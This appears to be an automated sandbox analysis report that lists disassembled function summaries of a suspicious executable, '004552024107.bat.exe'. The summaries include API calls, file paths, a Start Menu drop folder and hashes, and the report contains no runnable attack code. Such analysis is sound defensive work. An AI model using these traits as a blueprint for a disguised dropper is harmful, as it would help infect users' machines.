                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: CloseValuelstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\nsj7426.tmp
                                            • API String ID: 2655323295-3895652539
                                            • Opcode ID: 01be07207417a34e2fd7276a7f8dd5bd622f6c843808a50c06c527054a50520e
                                            • Instruction ID: bcff8488b3c7483af384f27edc247fb8d09a012b63b7e061f1957b9ca53072ec
                                            • Opcode Fuzzy Hash: 01be07207417a34e2fd7276a7f8dd5bd622f6c843808a50c06c527054a50520e
                                            • Instruction Fuzzy Hash: A5118172E04118BFEF10AFA59E49AAE7AB4EB44314F20443FF505F71D1C6B98D829A18

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1058 405e4f-405e59 1059 405e5a-405e85 GetTickCount GetTempFileNameA 1058->1059 1060 405e94-405e96 1059->1060 1061 405e87-405e89 1059->1061 1063 405e8e-405e91 1060->1063 1061->1059 1062 405e8b 1061->1062 1062->1063
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00405E63
                                            • GetTempFileNameA.KERNELBASE(0000000C,?,00000000,?,?,004033D6,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008), ref: 00405E7D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: CountFileNameTempTick
                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                            • API String ID: 1716503409-3756726018
                                            • Opcode ID: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                            • Instruction ID: 3970c65dfeb72379d163dc795dbdbe3f0392b49dfad0d6f3c406a96719355742
                                            • Opcode Fuzzy Hash: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                            • Instruction Fuzzy Hash: A0F082363042046BDB109F56EC04B9B7B9CEF91750F10803BF9889B180D6B099558798
                                            APIs
                                            • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020F5
                                              • Part of subcall function 004053D1: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,00000000,00424440,76D523A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                              • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,00000000,00424440,76D523A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                              • Part of subcall function 004053D1: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,00000000,00424440,76D523A0), ref: 0040542D
                                              • Part of subcall function 004053D1: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll), ref: 0040543F
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402105
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00402115
                                            • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040217F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                            • String ID:
                                            • API String ID: 2987980305-0
                                            • Opcode ID: 056f6e09274932c5806e516a526782628814fdef0fe3ef9b51a109e535a48abd
                                            • Instruction ID: 18bbb9f6491bb16bc869df63e9f5beea4603ad23440c914569cabcc4b16c920a
                                            • Opcode Fuzzy Hash: 056f6e09274932c5806e516a526782628814fdef0fe3ef9b51a109e535a48abd
                                            • Instruction Fuzzy Hash: ED21C931A00115BBCF20BF659F89B6F7570AB40358F20413BF611B61D1CABD49839A5E
                                            APIs
                                              • Part of subcall function 00405CB8: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,0000000C,00405D24,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,76D53410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,76D53410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe"), ref: 00405CC6
                                              • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CCB
                                              • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CDF
                                            • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401632
                                              • Part of subcall function 00405897: CreateDirectoryA.KERNELBASE(00431400,?), ref: 004058D9
                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Branchiostomidae11,00000000,00000000,000000F0), ref: 00401661
                                            Strings
                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Branchiostomidae11, xrefs: 00401656
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Branchiostomidae11
                                            • API String ID: 1892508949-67800706
                                            • Opcode ID: 2c20d4c644fd78e3d1f4ce17685fc2594679ef97166e32e1fcd970dca5652f26
                                            • Instruction ID: 0b6d2b43488905cbaa276f6c0cac56371e043703d2fe031d841b632f48d4a949
                                            • Opcode Fuzzy Hash: 2c20d4c644fd78e3d1f4ce17685fc2594679ef97166e32e1fcd970dca5652f26
                                            • Instruction Fuzzy Hash: 3911E331904240AFDF307F754D41A7F26B0DA56724B68497FF891B22E2C63D49439A6E
                                            APIs
                                            • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000000,?,?,00406432,80000002), ref: 004061BA
                                            • RegCloseKey.KERNELBASE(?,?,00406432,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll), ref: 004061C5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: CloseQueryValue
                                            • String ID: Call
                                            • API String ID: 3356406503-1824292864
                                            • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                            • Instruction ID: 11b83480b68dea0a629fd90b3ddfe96452127a043c469d5d543a73811e09722f
                                            • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                            • Instruction Fuzzy Hash: 9A01D472500209ABCF22CF10CD05FDB3FA8EF54354F01403AF915A6191D774CA64CB94
                                            APIs
                                            • GlobalFree.KERNEL32(00833D38), ref: 00401C1B
                                            • GlobalAlloc.KERNEL32(00000040,00000404), ref: 00401C2D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Global$AllocFree
                                            • String ID: Call
                                            • API String ID: 3394109436-1824292864
                                            • Opcode ID: 0514f784d2a2b378cc714ce1c47b00427531ebb3eb621da23fd343847ac9c6fe
                                            • Instruction ID: 9dc913a82bccb3a17233260e0918e107c000b9093c8e114c97909187c283bf28
                                            • Opcode Fuzzy Hash: 0514f784d2a2b378cc714ce1c47b00427531ebb3eb621da23fd343847ac9c6fe
                                            • Instruction Fuzzy Hash: 292181B2600105EBDB50BFA58E84E5E72E8EB44318711453BF902F32D1DBBCE8169B9D
                                            APIs
                                              • Part of subcall function 00406620: FindFirstFileA.KERNELBASE(76D53410,0042BCD8,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,00405D50,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,76D53410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,76D53410,C:\Users\user\AppData\Local\Temp\), ref: 0040662B
                                              • Part of subcall function 00406620: FindClose.KERNEL32(00000000), ref: 00406637
                                            • lstrlenA.KERNEL32 ref: 00402358
                                            • lstrlenA.KERNEL32(00000000), ref: 00402362
                                            • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 0040238A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: FileFindlstrlen$CloseFirstOperation
                                            • String ID:
                                            • API String ID: 1486964399-0
                                            • Opcode ID: 291976f7d3112056eb6b717bd47d13cf5f6b9c3e892707c150601705bf3dcc2a
                                            • Instruction ID: 014db6f64816cec2a1970dfcbbf9fa03b0cf1b46d42cec59bb2956c4bbb3b767
                                            • Opcode Fuzzy Hash: 291976f7d3112056eb6b717bd47d13cf5f6b9c3e892707c150601705bf3dcc2a
                                            • Instruction Fuzzy Hash: 35117071E04209ABDB10EFF58A45A9EB7F8AF00314F10407BA501F72C2D6FDC5428B59
                                            APIs
                                            • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025E7
                                            • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025FA
                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,00000000,00000011,00000002), ref: 00402612
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Enum$CloseValue
                                            • String ID:
                                            • API String ID: 397863658-0
                                            • Opcode ID: 4c7cffd82a1a6ff72a98075f8b8725b621981bbded826c54beb525449930f380
                                            • Instruction ID: cba12c4e2b45f70554d055d57f05f50eb42167a32c5ceb359e12f1818167ad50
                                            • Opcode Fuzzy Hash: 4c7cffd82a1a6ff72a98075f8b8725b621981bbded826c54beb525449930f380
                                            • Instruction Fuzzy Hash: 4E01BC71604204AFEB218F54DE98ABF7AACEB40348F10443FF005A61C0DAB84A459A29
                                            APIs
                                            • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402573
                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj7426.tmp,00000000,00000011,00000002), ref: 00402612
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: CloseQueryValue
                                            • String ID:
                                            • API String ID: 3356406503-0
                                            • Opcode ID: dcdcdbe78ff3a909b69e1bc964059ef71c3d22f6032091b40b69186da43a403e
                                            • Instruction ID: 97fa2cc47e124225833d1b044c3f4c0ff185fe65e0aec06a9837656ed07e9740
                                            • Opcode Fuzzy Hash: dcdcdbe78ff3a909b69e1bc964059ef71c3d22f6032091b40b69186da43a403e
                                            • Instruction Fuzzy Hash: 6511C171905205EFDF20CF60CA985AE7AB4EF01344F20883FE446B72C0D6B88A45DA1A
                                            APIs
                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                            • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: a4ad1f289275d07b12332ff40cf82794c587183748ad10ec12a076e6d131a720
                                            • Instruction ID: 80ce8cba2e1b90c3c9584b4bf9ae45de9eb83361fcac52349235150bfd3c5ac5
                                            • Opcode Fuzzy Hash: a4ad1f289275d07b12332ff40cf82794c587183748ad10ec12a076e6d131a720
                                            • Instruction Fuzzy Hash: C801F4317242209BE7295B399D08B6A36D8E710754F50823FF995F71F1E678CC028B5C
                                            APIs
                                            • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 0040246F
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402478
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: CloseDeleteValue
                                            • String ID:
                                            • API String ID: 2831762973-0
                                            • Opcode ID: 367c10f48611654ec83905158c0e7abb7b05128d9b12c6fa4614681cb29fe441
                                            • Instruction ID: 01f6084b7650a9b213f52d22935e9030d34abb49b24569214b94c05b06999087
                                            • Opcode Fuzzy Hash: 367c10f48611654ec83905158c0e7abb7b05128d9b12c6fa4614681cb29fe441
                                            • Instruction Fuzzy Hash: D3F0B132604121AFDB60EBA49F4DA7F72A99B40314F15003FF101B71C1D9F84D42466E
                                            APIs
                                            • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A56
                                            • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A69
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: EnvironmentExpandStringslstrcmp
                                            • String ID:
                                            • API String ID: 1938659011-0
                                            • Opcode ID: 1f740ebdafb4e989a716510470814d0f4b96e2deadac2d7748d55cb63aed77a8
                                            • Instruction ID: 106b93b956adcb394031d7b68410eec4a4f19a4829598155c7958b8f8b1c482a
                                            • Opcode Fuzzy Hash: 1f740ebdafb4e989a716510470814d0f4b96e2deadac2d7748d55cb63aed77a8
                                            • Instruction Fuzzy Hash: E8F08231B01201EBCB20CF659E48AAF7EE8DF51354B10403BE145F6190D6788643DF5C
                                            APIs
                                            • CreateDirectoryA.KERNELBASE(00431400,?), ref: 004058D9
                                            • GetLastError.KERNEL32 ref: 004058E7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: CreateDirectoryErrorLast
                                            • String ID:
                                            • API String ID: 1375471231-0
                                            • Opcode ID: 3953c50c5734a5342b3d9bd696b660d903f899823d07f085df3ad9df62cd1170
                                            • Instruction ID: 6d4ac730157cfa02be50de44a6d7979ff339f577f95dd1204a0ac4d64297c34f
                                            • Opcode Fuzzy Hash: 3953c50c5734a5342b3d9bd696b660d903f899823d07f085df3ad9df62cd1170
